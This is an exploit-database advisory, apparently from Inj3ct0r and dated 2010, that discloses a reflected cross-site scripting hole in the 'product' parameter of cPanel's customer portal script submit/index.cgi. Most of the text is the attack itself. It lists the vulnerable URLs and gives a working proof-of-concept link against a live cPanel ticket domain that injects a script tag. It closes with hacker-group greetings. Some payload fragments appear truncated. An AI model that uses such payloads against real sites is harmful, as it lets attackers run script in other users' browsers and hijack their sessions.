==================================================== cPanel Customer Portal (index.cgi) Xss Vulnerability ==================================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 # [+] Discovered By: Inj3ct0r Team # [+] 1-9-2010 # [+] Version: 2007-2008 # [+] Download:http://www.cpanel.net/ --------------------------------------------------------------- -=[ exploit ]=- http://localhost.cpanel.net/submit/index.cgi?step=&reqtype=sales&product= [ XSS ] http://127.0.0.1.cpanel.net/submit/index.cgi?step=&reqtype=sales&product= [ XSS ] "> "> ---------------------------------------------------------------------- -=[ Example ]=- https://tickets.cpanel.net/submit/index.cgi?step=&reqtype=sales&product=%22%3E%3Cscript%3Ealert(%22inj3ct0r%22)%3C/script%3E -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ================== Greetz ================================================== SeeMe ; Inj3ctOr ; Sid3^effects ; L0rd CrusAd3r ;indoushka ; The_Exploited ; Sn!pEr.S!Te